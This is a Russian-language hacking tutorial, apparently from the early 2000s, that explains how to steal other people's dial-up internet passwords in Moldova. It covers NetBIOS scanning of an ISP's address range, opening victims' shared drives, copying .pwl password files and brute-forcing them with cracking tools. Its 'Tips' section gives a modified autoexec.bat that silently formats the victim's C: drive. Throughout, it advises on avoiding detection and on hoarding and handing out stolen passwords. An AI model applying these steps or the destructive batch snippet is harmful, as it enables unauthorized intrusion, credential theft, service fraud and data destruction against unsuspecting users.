Всем привет!. Вот и я решил написать статью про халявный инет Всё очень просто. Идёшь к “другу” (подруге :)) с флопиком (дискетой) . На флопике стоит прога OpenPass 1.1… Короче дальше всё понятно: запускаешь эту прогу (с дискеты, чтобы не забыть копию у него на винте…). Если пароли у него сохранены, то при открытии Соединения (My Connection), или как оно там называется, увидишь сначала звёздочки вместо пароля… Если поместить курсор мыши поверх звёздочек, то пароль откроется (Боже, благодарим тебя за OpenPass 1.1 :)). Так я спёр свой первый пароль к инету. А потом встретил zONavets’а… и он мне кое-что рассказал. С тех пор я начал сам вливаться в этот загадочный мир Интернета.

Короче, что нам нужно чтобы заняться этим “полезным” делом:

1. Компьютер, желательно персональный (Тетрис не катит!)

2. Windows 98 SE. Он мне нравится… В 2000-й не пробовал. Теоретически он интегрируется со старыми lan-manager’ами.. [[примечание zONavets'а: 2000-я Винда работает как хороший провайдер (она блокирует все попытки залезть на чужой винт), так что можете и не пытаться.]]

3. Интернет (Dialup,ISDN…)

4. Пиво (1, 2, 3, 4 бутылки - кому как.. :)).

5. Время (примерно часик… иногда и 15-ти минут хватает).

6. Проги.

Взлом

Итак, начнём… У тебя есть комп, Инет… Платить за последний ты уже устал… Да и денег как-то катастрофически не хватает Вывод: Надо найти 2-3 чужих пароля… Подключаемся к инету. Когда появляется надпись “Verifying username and password” твоему компу присваивается сетевой адрес (IP Address) и ещё много всякой фигни (DNS и т.д.). Подключение завершено… Что дальше? Открываешь 1-ю бутылку пива и читаешь дальше. Таких как ты в Молдове много… У них у всех логично есть Интернет (следовательно и пароль к нему). Если хозяин пароля не мазохист, то в соединении у него стоит флажок “save password“. В этом вся фишка. Все пароли dialup храняться в маленьком файлике размером от 860 байт до 2-3 Кб *.pwl [[примечание zONavets'а: минимальный размер не 860 байт, а 688 байт :)]]. Вместо “*” стоит имя юзера [[примечание zONavets'а: так как максимальная длина имени pwl-файла ограничена 8-ю символами, то имя юзера может быть длиннее, чем имя pwl-файла (например, если юзер - Alexander, то pwl-фал будет называться alexande.pwl) ]]. В этом файле и хранятся все пароли. Короче надо его достать. Как? Да очень просто… Все pwl-файлы хранятся в директории \ … По-русски это звучит так : “c:\windows\”. (Кстати, я встречал приколистов, которые инсталлируют Винду в папку “Окна” или “suxxx” :)). Нам нужно добраться до этой директории. Сначала определяемся пароль какого провайдера нам нужен. Для примера возьмём наш любимый MoldTeleCom :). Интервал его IP-адресов: 212.0.201.1 - 212.0.201.255. Для начала этого хватит (см. раздел ПРОБЛЕМЫ). Делее нам потребуется NetBIOS-сканнер. Что он вытворяет? Посылает NetBIOS-запросы к удалённым компьютерам. Существет куча таких сканнеров. Например NAT (NetBIOS Auditing Tool), Legion, i т.д. Но рекоммендую ENT3 - Essential Net Tools 3.0 (спасибо zONavets’у [[ Примечание zONavets'a: Пожалуйста! ]] ). Она проста в использовании и при этом довольно мощная. Крэк для неё найдёшь в инете или попросишь у меня или у zONavets’a [[ Примечание zONavets'a: Я не помню, где он у меня завалялся.. :)) ]] И всё будет ОК.

Как работает ENT3 zONavets написал, так что не буду тебя рассказывать (лень!). Главное чтобы ты в IP Range написал 212.0.201.1 и нажал “Start“. И подождал чуть-чуть. Не трать время - открой 2-ю бутылку пива! :). Скан закончился. В окне есть Name, Workgroup, RS, IP Address и MAC Address. Name - это то, что этот ламер писал в User, когда инсталлил Винду. RS - если YES то у него есть share, если NO - то оставь его в покое. Последнее что тебе нужно знать, это MAC Address. Обычно для Windows 95/98/Me он начинается с 44:45…. Если хочешь узнать OS, нужно сканировать комп серьёзно. Теперь щёлкни по “RS” левой кнопкой мыши. Все компы с RS=YES сгруппировались. Теперь тоже самое проделай с MAC Address. Вот и потенциальные жертвы: все компы с RS=YES и 95/98/Me Виндой теперь красиво стоят в списке рядом. Берёшь первый комп. Открываешь его и ждёшь 5-10 секунд. В появившемся окне показано всё, что у него зашарено. Это может быть папка или целый диск. Иногда там ничего нет - не волнуйся, это не глюк Это значит, что конкретной шары у него нет, есть только IPC$. По-русски - это процесс передачи данных между твоим и удалённым компом. Кстати, IPC$ использует порт 135-139. Что означает “$”? Это хитрая фишка, придуманная для того, чтобы в открывшемся окне не было видно папок. Например, если есть зашаренная папка “admin$” то ты её не увидишь. Если не нашёл ничего нужного, переходи к другому компу. Нашёл C: D: E: F:…(встречаются и такие )?. Первое, что сделай - открой С: . Тут возможно 2 варианта: либо ты сразу заходишь на диск С: , либо появляется окно с просьбой ввести пароль. Естественно, пароль ты не знаешь. Рассмотрим этот вариант позже. Короче, зашёл ты на его диск C: . Ищи папку папку “Windows”, “Win98, “WinME” , “windows.000 или всё что напоминает системную паку Windows. Нашёл, да? Теперь открываешь её и ждёшь. Иногда приходится ждать 2-3 минуты. Что делать дальше? Помнишь про фалы “PWL”? Они-то тебе и нужны. Как их найти? Очень просто: кликаешь в папке с Виндой правой кнопкой мыши и выбираешь Arrange Icons - By Type (В русской Винде: Упорядочить Значки - По Типу) - так все PWL будут стоять рядом.

ПРЕДУПРЕЖДЕНИЕ: Правую кнопку мыши нужно нажимать на пустом месте, а не на файле! Если нажмёшь на файле, то он будет грузиться очень долго…Вплоть до зависания твоей системы! 70 процентов гарантии, что она зависнет! Не веришь? Ну, ну… ).

Файлы обычно стоят в следующем порядке: сначала папки, потом все EXE-файлы, DLL, BMP, INI, CPE, DAT, GIF, LOG и потом PWL, после них - SAM. Лично я сначала вижу SAM-файлы, а потом PWL (может мне очки купить надо, a? :)) )… Нашёл эти PWL? ОК. Теперь скопируй их себе на винт. Тормози!! Ты чё делаешь?! ПРЕДУПРЕЖДЕНИЕ не читал? А зря…! Не делай right-click… Научись пользоватся Сtrl+С. Я не шучу. Если скопируешь все эти файлы за один раз то будет быстрее… Всё? Короче, с этим разобрались… А что если диск C: запаролен? Вот это самое интересное. Компания Microsoft(R) использует Lan Manager, который был разработан очень давно компанией IBM. Он старый, как мир, следовательно у него куча глюков! В наши дни хакеры научились использовать эти глюки для довольно быстрого взлома паролей… (доказано опытом: пароль из 6-ти символов ломается за 1,5 минуты!… Причем не словарём, а перебором всех символов). Есть пару хороших прог для этого. Я использую Languard Network Scanner. Мощный сканнер, выдаёт до фига информации о компе, но самое главное: Показывает установленную ОС с довольно высокой степенью вероятности… Но и это не самое главное, самое главное - это наличие функции взлома пароля к ресурсу. Как это делается? Вот так:

1. В ENT3 делаешь right-click по нужному компу и выбираешь “copy IP Address“.

2. Вставляешь этот адрес в Languard Network Scanner (далее просто Languard) и нажимаешь Start. При запуске Languard из 98-й Винды он требует 2000-й или NT-шной Винды. Не обращай внимания - в 98-й тоже работает! Просто не сможешь подключиться к зашаренным ресурсам компов с установленной NT.

3. Если Languard ничего не найдёт, то увеличь Delay в опциях.

4. Вот примерные результаты сканирования:

OS Win98/WinME

User: arinel

TTL: 128 (same network segment)…

Address Mask:255.0.0.0

Shares(4): IPC$ C D E

Open Ports(1) 139-NetBios Session Service

Делаешь правый клик на C. Мы знаем, что он запаролен, поэтому выбираем “Crack Password Win9X“. Нет такого? Ну это естественно, ведь о том что диск запаролен знаем только мы, а Languard не знает. Поэтому просто щёлкаем 2 раза по C: . Появляется уже знакомое окно, закрываем его. И ещё раз делаем правый клик на диске C: . Появилось “Crack password“? Да неужели? :)) Нажимаем. (Кстати, предварительно в опциях, в разделе “cracking” поставь “use all characters“, а в разделе “session” выбери “NULL“) Внизу видна полоса прогресса (Languard подбирает пароли ). Короче, когда подбор закончится, появится сообщение с паролем. Вот и всё! Теперь заходи на запароленный С: и ищи PWL, как сказано выше. Так… Часть урока уже прошли. Тяжелооооо… Теперь у нас есть куча этих PWL, да? Как узнать пароли? Не Блокнотом - это точно Следующая часть урока: Взлом PWL Находишь прогу “PWL Tools 3.0“. Она у меня есть вместе с крэком, скоро размещу её где-то . Запускаешь прогу и жмёшь “Browse“. Выбираешь одну из найденных PWL. Что жать дальше? Конечно же Check Password! Это для проверки, если файл не пустой. Если всё ОК, то в окошке появятся все пароли, записанные в этом PWL. Если прога говорит, что пароль неверен, то надо взломать его подбором. Довольно скучная работа. Но для тренировки мозгов сойдёт :). Конечно же, писать перед входом в Винду всякий раз что-то типа raz _08/3mG+b00admZ32 как-то надоедает :)) Поэтому некоторые выбирают пароли типа 1234, или 1 (короче, что-то простое). В любом случае ручным подбором его не взломать Проще нажать кнопку “Search Password Fast“. Пароль из 4-х букв ломается довольно быстро - примерно 4 секунды :). 5,6,7,8 букв - это уже зависит от процессора. Если у тебя Athlon XP 1800+ то тебе прийдётся ждать где-то 15 минут. У меня проц на 900 MHz - это не 15 минут Короче, чем мощнее процессор тем лучше. Если через 10 минут ничего не вломалось, то лучше оставить эту PWL в какой-нибудь папке “Password Protected” и потом, когда будет время взломать её. Берёшь другой файл. И действуешь по тому же сценарию: “Check Password” - “Search Password Fast“. Довольно просто…

Заключение

Ну вот и всё… Пользуйся на здоровье. Но помни: с законом не шутят!. Всем интересно как это делается и всё такое… Но всё намного серьёзней чем ты думаешь. За это могут и в зону отправить, и в репу настучать :))) Думаешь у нас с законодательством беспредел? Ошибаешься! С февраля 2002-го года в Молдове принят закон, пресекающий незаконные действия хакеров. Короче если спалят - отмазываться будешь сам, не вали только на нас с zONavets’ом! Испугался? Рано ещё… Ещё пару минут внимания. Без проблем не обойтись, поэтому решил добавить ещё один раздел:

Проблемы

1. Q. “Я не могу подключиться к компам… ENT3 сообщает: “The Network request is not supported“”

A. У тебя хотя бы есть Network Neighbourhood? нету, правда… А должен быть! Короче заходишь в Control Panel->Network. Там должно стоять “Client for Microsoft Networks“, “File and printer sharing for Microsoft Networks“, “TCP/IP“. Если чего-то не хватает, то добавь: там есть кнопка “Add“->”Client” или “Service” - “Microsoft“->”чё тебе надо “. Теперь всё должно работать. не забудь сделать Restart, предварительно поставив в “Primary Network Logon” : “Windows Family Logon“, а то Винда вечно будет просить пароль на вход в Винду, даже если у тебя его нету :)… Также там есть кнопка: “File and printer sharing“. Если ты поставишь “I want to be able to give others access to my files” то RS твоего компа тоже будет = YES. Если хочешь чтобы у тебя ничего не спёрли, то проверь чтобы твои C: , D: и т.д. не были зашаренными. Вот и всё. Ещё есть раздел “Identification“. Там просто меняешь свой “Name” и “Workgroup” - но это так, между прочим.

2. Q. “Тоже самое… “….the user isnt logged on to network…”"

A. Просто открываешь “My computer“->”Dial-Up Networking“. Там заходишь в Properties своего Интернет аккаунта, потом в “Server Types“. Убедись что там стоит флажок “Log on to network“. И всё!. Можешь убрать флажки с “IPX/SPX” и с “NetBEUI“. Я где-то вычитал, что любой комп можно взломать, даже если у него нет зашаренных ресурсов, а есть только этот протокол “NetBEUI“. Подробнее об этом говорить не буду - бережённого Бог бережёт.

3. Q. “Тоже самое… “The network name cannot be found“”

A. Либо юзер вышел из инета, либо у него стоит firewall. Сделай ping. Если результат пингования - “request timed out” то возможны те же два варианта: либо его нету в инете, либо firewall фильтрует пакеты. Проверим ещё раз: запусти любой порт-сканнер (их куча). Если все порты закрыты, то комп 100% не торчит в сети… Только вот не надо терять столько времени на вышеперечисленные действия - есть и другие компы :))

4. Q. “Languard постоянно пишет “No computers found“”

A. “Scan“->”Options“. Поставь там Delay 30000. Можно и поменьше. Такая проблема возникает из-за нашей супер-скорости dialup’a

5. Q. “Жертва может узнать, что я к ней подключён?”

A. Да… Ещё как! Жертва жмёт “start“->”programs“->”ms-dos prompt” и пишет “netstat -an” и ДОС показывает адреса всех компов, которые подключены к ней , и даже порт через который произошло подключение. Но если ты скопировал файлы, то уже поздно что-либо делать Кстати, если она решит сделать shutdown, то Винда выдаст сообщение “You have currently 1 users connected to your computer. Shutting down will disconnect them“.

6. Q. “Как узнать телефон и IP range провайдеров?”

A. Я не справочное бюро :)) Найдёшь меня в мИРКе - скажу! :).

7. Q. “Как форматнуть винт?”

A. Смотри раздел Советы.

8. Q. “Как узнать свой IP?”

A. Заходишь в мИРК и пишешь “/dns “. [[ Примечание zONavets'a: На самом деле всё намного проще: Жмёшь Start - Run - "winipcfg", или запускаешь консоль МС-ДОС и пишешь "ipconfig" ]]

9. Q. “Можно ли узнать мой номер телефона, если я сижу под чужим паролем?”

A. Проще простого! Хозяин пароля звонит провайдеру и спрашивает: ” С какого номера телефона сидели под моим паролем такого-то числа во столько-то?”. Там ему всё скажут..

Есть ещё проблемы? Пиши на мыло!.

Советы

1. Не форматируй винчестер! Не будь идиотом. Ты не знаешь его, он не знает тебя.. Это главный принцип. А главная задача - просто украсть пароль. Но всё равно расскажу как это сделать, чтобы не мучился Кроме этого тебе нужен FULL-доступ на тот винт. Если есть такой, то можно поковыряться в его autoexec.bat. Он валяется в C:\. Разумнее будет скопировать его батник себе на винт, изменить его и потом снова залить на тот винт в c:\. Что писать? Примерно следующее :

rem Примерно то, что было. PATH=C:\WINDOWS;C:\WINDOWS\COMMAND;C:\WINDOWS\SYS>TEM

mode con codepage prepare=((866) C:\WINDOWS\COMMAND\ega3.cpi)

mode con codepage select=866

rem Примерно то, что стало после модификации.

@echo off > nul @PATH=C:\WINDOWS;C:\WINDO>WS\COMMAND;C:\WINDOWS\SYSTEM >nul

@mode con codepage prepare=((866) C:\WINDOWS\COMMAND\ega3.c>pi) >nul @mode con codepage select=866 >nul

@echo Y|format c: /Q /V:HACKED > nul

rem Теоретически должно работать

Если что не так - напишите на мыло. Только ламеры форматируют удалённые винчестеры! Ты не для этого на него залез! Запомни… И точка!

2. Стащил пароль - не давай его сразу 50-ти юзерам. Лучше создай свою коллекцию. Пользуйся всеми паролями. Те пароли которые работают почти бесперебойно можешь оставить себе и лучшим друзьям (подругам :)). Остальные можешь раздавать знакомым.

3. Не будь жадиной - быстро устанешь.

4. Позвонят домой - молись!